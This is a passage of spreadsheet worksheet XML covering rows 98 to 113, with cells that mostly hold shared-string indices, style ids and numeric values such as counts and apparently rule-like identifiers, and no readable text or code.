        <v>10</v>
      </c>
      <c r="V98" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W98" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X98" s="49">
        <v>2.0</v>
      </c>
      <c r="Y98" s="103">
        <v>2.0</v>
      </c>
      <c r="Z98" s="104" t="s">
        <v>75</v>
      </c>
      <c r="AA98" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB98" s="62" t="s">
        <v>719</v>
      </c>
      <c r="AC98" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD98" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE98" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF98" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG98" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="99" ht="153.75" customHeight="1">
      <c r="B99" s="42" t="s">
        <v>247</v>
      </c>
      <c r="C99" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D99" s="43" t="s">
        <v>720</v>
      </c>
      <c r="E99" s="43" t="s">
        <v>721</v>
      </c>
      <c r="F99" s="52" t="s">
        <v>722</v>
      </c>
      <c r="G99" s="43" t="s">
        <v>723</v>
      </c>
      <c r="H99" s="44" t="s">
        <v>724</v>
      </c>
      <c r="I99" s="44" t="s">
        <v>725</v>
      </c>
      <c r="J99" s="44" t="s">
        <v>726</v>
      </c>
      <c r="K99" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L99" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M99" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N99" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O99" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P99" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q99" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R99" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S99" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T99" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U99" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V99" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W99" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X99" s="49">
        <v>2.0</v>
      </c>
      <c r="Y99" s="49">
        <v>4.0</v>
      </c>
      <c r="Z99" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA99" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB99" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC99" s="62" t="s">
        <v>727</v>
      </c>
      <c r="AD99" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE99" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF99" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG99" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="100" ht="153.75" customHeight="1">
      <c r="B100" s="42" t="s">
        <v>247</v>
      </c>
      <c r="C100" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D100" s="43" t="s">
        <v>728</v>
      </c>
      <c r="E100" s="43" t="s">
        <v>729</v>
      </c>
      <c r="F100" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G100" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H100" s="44" t="s">
        <v>730</v>
      </c>
      <c r="I100" s="44" t="s">
        <v>731</v>
      </c>
      <c r="J100" s="44" t="s">
        <v>732</v>
      </c>
      <c r="K100" s="45">
        <v>402.0</v>
      </c>
      <c r="L100" s="45">
        <v>1.0</v>
      </c>
      <c r="M100" s="45">
        <v>3.0</v>
      </c>
      <c r="N100" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O100" s="47">
        <v>402.0</v>
      </c>
      <c r="P100" s="47">
        <v>1.0</v>
      </c>
      <c r="Q100" s="47">
        <v>3.0</v>
      </c>
      <c r="R100" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S100" s="48">
        <v>402.50447</v>
      </c>
      <c r="T100" s="48">
        <v>2.0</v>
      </c>
      <c r="U100" s="48">
        <v>10.0</v>
      </c>
      <c r="V100" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W100" s="49" t="s">
        <v>733</v>
      </c>
      <c r="X100" s="49">
        <v>8.0</v>
      </c>
      <c r="Y100" s="49">
        <v>24.0</v>
      </c>
      <c r="Z100" s="46" t="s">
        <v>526</v>
      </c>
      <c r="AA100" s="102" t="s">
        <v>188</v>
      </c>
      <c r="AB100" s="65" t="s">
        <v>734</v>
      </c>
      <c r="AC100" s="62" t="s">
        <v>735</v>
      </c>
      <c r="AD100" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE100" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF100" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG100" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="101" ht="153.75" customHeight="1">
      <c r="B101" s="42" t="s">
        <v>247</v>
      </c>
      <c r="C101" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D101" s="43" t="s">
        <v>736</v>
      </c>
      <c r="E101" s="43" t="s">
        <v>737</v>
      </c>
      <c r="F101" s="43" t="s">
        <v>738</v>
      </c>
      <c r="G101" s="43" t="s">
        <v>739</v>
      </c>
      <c r="H101" s="44" t="s">
        <v>740</v>
      </c>
      <c r="I101" s="44" t="s">
        <v>741</v>
      </c>
      <c r="J101" s="44" t="s">
        <v>742</v>
      </c>
      <c r="K101" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L101" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M101" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N101" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O101" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P101" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q101" s="47"/>
      <c r="R101" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S101" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T101" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U101" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V101" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W101" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="X101" s="49">
        <v>2.0</v>
      </c>
      <c r="Y101" s="49">
        <v>2.0</v>
      </c>
      <c r="Z101" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA101" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB101" s="62" t="s">
        <v>743</v>
      </c>
      <c r="AC101" s="62" t="s">
        <v>744</v>
      </c>
      <c r="AD101" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE101" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF101" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG101" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="102" ht="153.75" customHeight="1">
      <c r="B102" s="42" t="s">
        <v>247</v>
      </c>
      <c r="C102" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D102" s="43" t="s">
        <v>736</v>
      </c>
      <c r="E102" s="43" t="s">
        <v>737</v>
      </c>
      <c r="F102" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G102" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H102" s="44" t="s">
        <v>745</v>
      </c>
      <c r="I102" s="44" t="s">
        <v>449</v>
      </c>
      <c r="J102" s="44" t="s">
        <v>746</v>
      </c>
      <c r="K102" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L102" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M102" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N102" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O102" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P102" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q102" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R102" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S102" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T102" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U102" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V102" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W102" s="49" t="s">
        <v>747</v>
      </c>
      <c r="X102" s="49">
        <v>3.0</v>
      </c>
      <c r="Y102" s="49">
        <v>6.0</v>
      </c>
      <c r="Z102" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA102" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB102" s="62" t="s">
        <v>748</v>
      </c>
      <c r="AC102" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD102" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE102" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF102" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG102" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="103" ht="153.75" customHeight="1">
      <c r="B103" s="42" t="s">
        <v>247</v>
      </c>
      <c r="C103" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D103" s="43" t="s">
        <v>749</v>
      </c>
      <c r="E103" s="43" t="s">
        <v>750</v>
      </c>
      <c r="F103" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G103" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H103" s="44" t="s">
        <v>751</v>
      </c>
      <c r="I103" s="44" t="s">
        <v>752</v>
      </c>
      <c r="J103" s="44" t="s">
        <v>753</v>
      </c>
      <c r="K103" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L103" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M103" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N103" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O103" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P103" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q103" s="47"/>
      <c r="R103" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S103" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T103" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U103" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V103" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W103" s="49">
        <v>2001117.2003195</v>
      </c>
      <c r="X103" s="49">
        <v>2.0</v>
      </c>
      <c r="Y103" s="49">
        <v>109.0</v>
      </c>
      <c r="Z103" s="46">
        <v>2001117.0</v>
      </c>
      <c r="AA103" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB103" s="62" t="s">
        <v>754</v>
      </c>
      <c r="AC103" s="62" t="s">
        <v>755</v>
      </c>
      <c r="AD103" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE103" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF103" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG103" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="104" ht="153.75" customHeight="1">
      <c r="B104" s="42" t="s">
        <v>756</v>
      </c>
      <c r="C104" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D104" s="43" t="s">
        <v>757</v>
      </c>
      <c r="E104" s="43" t="s">
        <v>758</v>
      </c>
      <c r="F104" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G104" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H104" s="44" t="s">
        <v>759</v>
      </c>
      <c r="I104" s="44" t="s">
        <v>282</v>
      </c>
      <c r="J104" s="44" t="s">
        <v>760</v>
      </c>
      <c r="K104" s="105">
        <v>42944.0</v>
      </c>
      <c r="L104" s="45">
        <v>1.0</v>
      </c>
      <c r="M104" s="45">
        <v>1.0</v>
      </c>
      <c r="N104" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O104" s="56" t="s">
        <v>761</v>
      </c>
      <c r="P104" s="47">
        <v>5.0</v>
      </c>
      <c r="Q104" s="47">
        <v>6.0</v>
      </c>
      <c r="R104" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S104" s="57" t="s">
        <v>762</v>
      </c>
      <c r="T104" s="48">
        <v>9.0</v>
      </c>
      <c r="U104" s="48">
        <v>14.0</v>
      </c>
      <c r="V104" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W104" s="54" t="s">
        <v>763</v>
      </c>
      <c r="X104" s="49">
        <v>15.0</v>
      </c>
      <c r="Y104" s="49">
        <v>25.0</v>
      </c>
      <c r="Z104" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA104" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB104" s="62" t="s">
        <v>764</v>
      </c>
      <c r="AC104" s="62" t="s">
        <v>765</v>
      </c>
      <c r="AD104" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE104" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF104" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG104" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="105" ht="153.75" customHeight="1">
      <c r="B105" s="42" t="s">
        <v>756</v>
      </c>
      <c r="C105" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D105" s="43" t="s">
        <v>757</v>
      </c>
      <c r="E105" s="43" t="s">
        <v>758</v>
      </c>
      <c r="F105" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G105" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H105" s="44" t="s">
        <v>766</v>
      </c>
      <c r="I105" s="44" t="s">
        <v>767</v>
      </c>
      <c r="J105" s="44" t="s">
        <v>768</v>
      </c>
      <c r="K105" s="105" t="s">
        <v>10</v>
      </c>
      <c r="L105" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M105" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N105" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O105" s="56" t="s">
        <v>10</v>
      </c>
      <c r="P105" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q105" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R105" s="46" t="s">
        <v>307</v>
      </c>
      <c r="S105" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T105" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U105" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V105" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W105" s="49">
        <v>2002749.0</v>
      </c>
      <c r="X105" s="49">
        <v>1.0</v>
      </c>
      <c r="Y105" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z105" s="46">
        <v>2002749.0</v>
      </c>
      <c r="AA105" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB105" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC105" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD105" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE105" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF105" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG105" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="106" ht="153.75" customHeight="1">
      <c r="B106" s="42" t="s">
        <v>756</v>
      </c>
      <c r="C106" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D106" s="43" t="s">
        <v>757</v>
      </c>
      <c r="E106" s="43" t="s">
        <v>758</v>
      </c>
      <c r="F106" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G106" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H106" s="44" t="s">
        <v>769</v>
      </c>
      <c r="I106" s="44" t="s">
        <v>282</v>
      </c>
      <c r="J106" s="44" t="s">
        <v>770</v>
      </c>
      <c r="K106" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L106" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M106" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N106" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O106" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P106" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q106" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R106" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S106" s="48" t="s">
        <v>771</v>
      </c>
      <c r="T106" s="48">
        <v>4.0</v>
      </c>
      <c r="U106" s="48">
        <v>5.0</v>
      </c>
      <c r="V106" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W106" s="49" t="s">
        <v>772</v>
      </c>
      <c r="X106" s="49">
        <v>7.0</v>
      </c>
      <c r="Y106" s="49">
        <v>13.0</v>
      </c>
      <c r="Z106" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA106" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB106" s="62" t="s">
        <v>773</v>
      </c>
      <c r="AC106" s="62" t="s">
        <v>774</v>
      </c>
      <c r="AD106" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE106" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF106" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG106" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="107" ht="153.75" customHeight="1">
      <c r="B107" s="42" t="s">
        <v>756</v>
      </c>
      <c r="C107" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D107" s="43" t="s">
        <v>775</v>
      </c>
      <c r="E107" s="43" t="s">
        <v>776</v>
      </c>
      <c r="F107" s="43" t="s">
        <v>777</v>
      </c>
      <c r="G107" s="43" t="s">
        <v>778</v>
      </c>
      <c r="H107" s="44" t="s">
        <v>779</v>
      </c>
      <c r="I107" s="44" t="s">
        <v>780</v>
      </c>
      <c r="J107" s="44" t="s">
        <v>778</v>
      </c>
      <c r="K107" s="105">
        <v>1448.0</v>
      </c>
      <c r="L107" s="45">
        <v>1.0</v>
      </c>
      <c r="M107" s="45">
        <v>3.0</v>
      </c>
      <c r="N107" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O107" s="56">
        <v>1448.0</v>
      </c>
      <c r="P107" s="47">
        <v>1.0</v>
      </c>
      <c r="Q107" s="47">
        <v>3.0</v>
      </c>
      <c r="R107" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S107" s="57">
        <v>1448.0</v>
      </c>
      <c r="T107" s="48">
        <v>1.0</v>
      </c>
      <c r="U107" s="48">
        <v>6.0</v>
      </c>
      <c r="V107" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W107" s="49" t="s">
        <v>781</v>
      </c>
      <c r="X107" s="49">
        <v>4.0</v>
      </c>
      <c r="Y107" s="49">
        <v>23.0</v>
      </c>
      <c r="Z107" s="46" t="s">
        <v>93</v>
      </c>
      <c r="AA107" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB107" s="65" t="s">
        <v>782</v>
      </c>
      <c r="AC107" s="62" t="s">
        <v>783</v>
      </c>
      <c r="AD107" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE107" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF107" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG107" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="108" ht="153.75" customHeight="1">
      <c r="B108" s="42" t="s">
        <v>756</v>
      </c>
      <c r="C108" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D108" s="43" t="s">
        <v>784</v>
      </c>
      <c r="E108" s="43" t="s">
        <v>785</v>
      </c>
      <c r="F108" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G108" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H108" s="44" t="s">
        <v>786</v>
      </c>
      <c r="I108" s="44" t="s">
        <v>282</v>
      </c>
      <c r="J108" s="44" t="s">
        <v>787</v>
      </c>
      <c r="K108" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L108" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M108" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N108" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O108" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P108" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q108" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R108" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S108" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T108" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U108" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V108" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W108" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X108" s="49">
        <v>2.0</v>
      </c>
      <c r="Y108" s="49">
        <v>4.0</v>
      </c>
      <c r="Z108" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA108" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB108" s="65" t="s">
        <v>631</v>
      </c>
      <c r="AC108" s="62" t="s">
        <v>788</v>
      </c>
      <c r="AD108" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE108" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF108" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG108" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="109" ht="153.75" customHeight="1">
      <c r="B109" s="42" t="s">
        <v>756</v>
      </c>
      <c r="C109" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D109" s="43" t="s">
        <v>789</v>
      </c>
      <c r="E109" s="43" t="s">
        <v>790</v>
      </c>
      <c r="F109" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G109" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H109" s="44" t="s">
        <v>791</v>
      </c>
      <c r="I109" s="44" t="s">
        <v>792</v>
      </c>
      <c r="J109" s="44" t="s">
        <v>793</v>
      </c>
      <c r="K109" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L109" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M109" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N109" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O109" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P109" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q109" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R109" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S109" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T109" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U109" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V109" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W109" s="49" t="s">
        <v>94</v>
      </c>
      <c r="X109" s="49">
        <v>3.0</v>
      </c>
      <c r="Y109" s="49">
        <v>7.0</v>
      </c>
      <c r="Z109" s="46" t="s">
        <v>94</v>
      </c>
      <c r="AA109" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB109" s="65" t="s">
        <v>794</v>
      </c>
      <c r="AC109" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD109" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE109" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF109" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG109" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="110" ht="153.75" customHeight="1">
      <c r="B110" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C110" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D110" s="43" t="s">
        <v>795</v>
      </c>
      <c r="E110" s="43" t="s">
        <v>796</v>
      </c>
      <c r="F110" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G110" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H110" s="44" t="s">
        <v>797</v>
      </c>
      <c r="I110" s="44" t="s">
        <v>798</v>
      </c>
      <c r="J110" s="44" t="s">
        <v>799</v>
      </c>
      <c r="K110" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L110" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M110" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N110" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O110" s="47" t="s">
        <v>800</v>
      </c>
      <c r="P110" s="47">
        <v>111.0</v>
      </c>
      <c r="Q110" s="47">
        <v>838.0</v>
      </c>
      <c r="R110" s="46" t="s">
        <v>50</v>
      </c>
      <c r="S110" s="48" t="s">
        <v>801</v>
      </c>
      <c r="T110" s="48">
        <v>114.0</v>
      </c>
      <c r="U110" s="48">
        <v>7133.0</v>
      </c>
      <c r="V110" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W110" s="49" t="s">
        <v>802</v>
      </c>
      <c r="X110" s="49">
        <v>325.0</v>
      </c>
      <c r="Y110" s="49">
        <v>10440.0</v>
      </c>
      <c r="Z110" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA110" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB110" s="62" t="s">
        <v>803</v>
      </c>
      <c r="AC110" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD110" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE110" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF110" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG110" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="111" ht="153.75" customHeight="1">
      <c r="B111" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C111" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D111" s="43" t="s">
        <v>795</v>
      </c>
      <c r="E111" s="43" t="s">
        <v>796</v>
      </c>
      <c r="F111" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G111" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H111" s="44" t="s">
        <v>797</v>
      </c>
      <c r="I111" s="44" t="s">
        <v>47</v>
      </c>
      <c r="J111" s="44" t="s">
        <v>804</v>
      </c>
      <c r="K111" s="45" t="s">
        <v>805</v>
      </c>
      <c r="L111" s="45">
        <v>9.0</v>
      </c>
      <c r="M111" s="45">
        <v>9.0</v>
      </c>
      <c r="N111" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O111" s="47" t="s">
        <v>806</v>
      </c>
      <c r="P111" s="47">
        <v>20.0</v>
      </c>
      <c r="Q111" s="47">
        <v>26.0</v>
      </c>
      <c r="R111" s="46" t="s">
        <v>807</v>
      </c>
      <c r="S111" s="48" t="s">
        <v>808</v>
      </c>
      <c r="T111" s="48">
        <v>23.0</v>
      </c>
      <c r="U111" s="48">
        <v>44.0</v>
      </c>
      <c r="V111" s="46" t="s">
        <v>50</v>
      </c>
      <c r="W111" s="49" t="s">
        <v>809</v>
      </c>
      <c r="X111" s="49">
        <v>36.0</v>
      </c>
      <c r="Y111" s="49">
        <v>58.0</v>
      </c>
      <c r="Z111" s="46" t="s">
        <v>810</v>
      </c>
      <c r="AA111" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB111" s="62" t="s">
        <v>803</v>
      </c>
      <c r="AC111" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD111" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE111" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF111" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG111" s="63" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="112" ht="153.75" customHeight="1">
      <c r="B112" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C112" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D112" s="43" t="s">
        <v>795</v>
      </c>
      <c r="E112" s="43" t="s">
        <v>796</v>
      </c>
      <c r="F112" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G112" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H112" s="44" t="s">
        <v>811</v>
      </c>
      <c r="I112" s="44" t="s">
        <v>509</v>
      </c>
      <c r="J112" s="44" t="s">
        <v>812</v>
      </c>
      <c r="K112" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L112" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M112" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N112" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O112" s="47" t="s">
        <v>813</v>
      </c>
      <c r="P112" s="47">
        <v>2.0</v>
      </c>
      <c r="Q112" s="47">
        <v>2.0</v>
      </c>
      <c r="R112" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S112" s="48" t="s">
        <v>813</v>
      </c>
      <c r="T112" s="48">
        <v>2.0</v>
      </c>
      <c r="U112" s="48">
        <v>2.0</v>
      </c>
      <c r="V112" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W112" s="49" t="s">
        <v>814</v>
      </c>
      <c r="X112" s="49">
        <v>5.0</v>
      </c>
      <c r="Y112" s="49">
        <v>43.0</v>
      </c>
      <c r="Z112" s="46" t="s">
        <v>298</v>
      </c>
      <c r="AA112" s="61" t="s">
        <v>188</v>
      </c>
      <c r="AB112" s="62" t="s">
        <v>815</v>
      </c>
      <c r="AC112" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD112" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE112" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF112" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG112" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="113" ht="153.75" customHeight="1">
      <c r="B113" s="42" t="s">
        <v>321</v>
      </c>
      <c r="C113" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D113" s="43" t="s">
        <v>816</v>
      </c>
      <c r="E113" s="43" t="s">
        <v>817</v>
      </c>
      <c r="F113" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G113" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H113" s="44" t="s">
        <v>818</v>
      </c>
      <c r="I113" s="44" t="s">
        <v>47</v>
      </c>
      <c r="J113" s="44" t="s">
        <v>819</v>
      </c>
      <c r="K113" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L113" s="45" t="s">
